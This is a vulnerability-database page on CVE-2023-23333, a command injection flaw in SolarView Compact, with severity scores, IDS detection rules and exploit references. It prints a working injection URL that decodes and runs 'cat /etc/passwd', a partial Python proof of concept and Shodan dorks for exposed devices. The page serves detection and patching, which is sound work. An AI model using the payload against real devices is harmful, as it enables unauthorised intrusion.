CVE-2023-23333
published 2023-02-06CVE-2023-23333: There is a command injection vulnerability in SolarView Compact through 6.00, attackers can execute commands by bypassing internal restrictions through…
PriorityP193critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
99.27%
99.9th percentile
There is a command injection vulnerability in SolarView Compact through 6.00, attackers can execute commands by bypassing internal restrictions through downloader.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| contec | solarview_compact_firmware | <= 6.00 | — |
Detection & IOCsextracted from sources · hover to see the quote
urlhttp://{ip}:{port}/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg%3D%3D|base64%20-d|bash%00.zip↗
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Contec SolarView Compact downloader.php Command Injection Attempt (CVE-2023-23333)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/downloader.php?file|3d 3b|"; fast_pattern; startswith; reference:url,attackerkb.com/topics/kE3lzTZGV2/cve-2023-23333; reference:cve,2023-23333; classtype:attempted-admin; sid:2051668; rev:1; metadata:affected_product CONTEC_SolvarView, attack_target Networking_Equipment, tls_state plaintext, created_at 2024_03_15, cve CVE_2023_23333, deployment Perimeter, performance_impact Low, confidence High, signature_severity Major, updated_at 2024_03_15, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services; target:dest_ip;)
bytes
/downloader.php?file|3d 3b|
- →Shodan dork to identify exposed SolarView Compact instances: search for 'http.html:"solarview compact"' or favicon hash '-244067125'
- →FOFA dork to identify exposed SolarView Compact instances
- →The exploit payload uses a null-byte (%00) followed by '.zip' to bypass file extension restrictions in the 'file' parameter of downloader.php
- →The exploit injects a semicolon (;) as the first character of the 'file' parameter to break out of the intended command context — look for URL-encoded %3B or literal ';' at the start of the file parameter value
- →After successful exploitation, the webserver process runs as user 'contec' — look for unexpected process spawning under this user
- →Exploit PoC checks for 'root' string in HTTP response body to confirm /etc/passwd read via command injection
- →The Nuclei template matches a reversed CVE string '33332-3202-EVC' in the response body as a blind command injection confirmation
- →Traffic is plaintext HTTP (not TLS); detection should be applied at the perimeter on unencrypted HTTP traffic
- ·The vulnerability affects SolarView Compact through version 6.00 only; the product is only available/deployed in Japan ↗
- ·The exploit requires no authentication (unauthenticated RCE), so no credential-based detection is applicable ↗
- ·EPSS score of 0.94216 (99.924th percentile) indicates very high likelihood of exploitation in the wild; prioritize detection and patching accordingly
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-vp93-ffq3-79vh: There is a command injection vulnerability in SolarView Compact through 6
ghsa_unreviewed·2023-02-07
CVE-2023-23333 [CRITICAL] CWE-77 GHSA-vp93-ffq3-79vh: There is a command injection vulnerability in SolarView Compact through 6
There is a command injection vulnerability in SolarView Compact through 6.00, attackers can execute commands by bypassing internal restrictions through downloader.php.
VulnCheck
contec solarview_compact Improper Neutralization of Special Elements used in a Command ('Command Injection')
vulncheck·2023·CVSS 9.8
CVE-2023-23333 [CRITICAL] contec solarview_compact Improper Neutralization of Special Elements used in a Command ('Command Injection')
contec solarview_compact Improper Neutralization of Special Elements used in a Command ('Command Injection')
There is a command injection vulnerability in SolarView Compact through 6.00, attackers can execute commands by bypassing internal restrictions through downloader.php.
Affected: contec solarview_compact
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://vulncheck.com/blog/solarview-exploitation; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-16&host_type=src&vulnerability=cve-2023-23333; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-22&host_type=src&vulnerability=cv
Suricata
ET WEB_SPECIFIC_APPS Contec SolarView Compact downloader.php Command Injection Attempt (CVE-2023-23333)
suricata·2024-03-15·CVSS 9.8
CVE-2023-23333 [CRITICAL] ET WEB_SPECIFIC_APPS Contec SolarView Compact downloader.php Command Injection Attempt (CVE-2023-23333)
ET WEB_SPECIFIC_APPS Contec SolarView Compact downloader.php Command Injection Attempt (CVE-2023-23333)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Contec SolarView Compact downloader.php Command Injection Attempt (CVE-2023-23333)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/downloader.php?file|3d 3b|"; fast_pattern; startswith; reference:url,attackerkb.com/topics/kE3lzTZGV2/cve-2023-23333; reference:cve,2023-23333; classtype:attempted-admin; sid:2051668; rev:1; metadata:affected_product CONTEC_SolvarView, attack_target Networking_Equipment, tls_state plaintext, created_at 2024_03_15, cve CVE_2023_23333, deployment Perimeter, performance_impact Low, confidence High, signature_severity Major, updated_at 2024_03_15, mitre_tactic_id T
Exploit-DB
SolarView Compact 6.00 - Command Injection
exploitdb·2024-03-14·CVSS 9.8
CVE-2023-23333 [CRITICAL] SolarView Compact 6.00 - Command Injection
SolarView Compact 6.00 - Command Injection
---
#- Exploit Title: SolarView Compact 6.00 - Command Injection
#- Shodan Dork: http.html:"solarview compact"
#- Exploit Author: ByteHunter
#- Email: [email protected]
#- Version: 6.00
#- Tested on: 6.00
#- CVE : CVE-2023-23333
import argparse
import requests
def vuln_check(ip_address, port):
url = f"http://{ip_address}:{port}/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg%3D%3D|base64%20-d|bash%00.zip"
response = requests.get(url)
if response.status_code == 200:
output = response.text
if "root" in output:
print("Vulnerability detected: Command Injection possible.")
print(f"passwd file content:\n{response.text}")
else:
print("No vulnerability detected.")
else:
print("Error: Unable to fetch response.")
def main():
parser = argpars
Nuclei
SolarView Compact 6.00 - OS Command Injection
nuclei·CVSS 9.8
CVE-2023-23333 [CRITICAL] SolarView Compact 6.00 - OS Command Injection
SolarView Compact 6.00 - OS Command Injection
SolarView Compact 6.00 was discovered to contain a command injection vulnerability, attackers can execute commands by bypassing internal restrictions through downloader.php.
Template:
id: CVE-2023-23333
info:
name: SolarView Compact 6.00 - OS Command Injection
author: Mr-xn
severity: critical
description: |
SolarView Compact 6.00 was discovered to contain a command injection vulnerability, attackers can execute commands by bypassing internal restrictions through downloader.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the system.
remediation: |
Apply the latest patch or update provided by the vendor to
Metasploit
SolarView Compact unauthenticated remote command execution vulnerability.
metasploit
SolarView Compact unauthenticated remote command execution vulnerability.
SolarView Compact unauthenticated remote command execution vulnerability.
CONTEC's SolarView Series enables you to monitor and visualize solar power and is only available in Japan. This module exploits a command injection vulnerability on the SolarView Compact `v6.00` web application via vulnerable endpoint `downloader.php`. After exploitation, an attacker will have full access with the same user privileges under which the webserver is running (typically as user `contec`).
No writeups or analysis indexed.
2023-02-06
Published
Exploited in the wild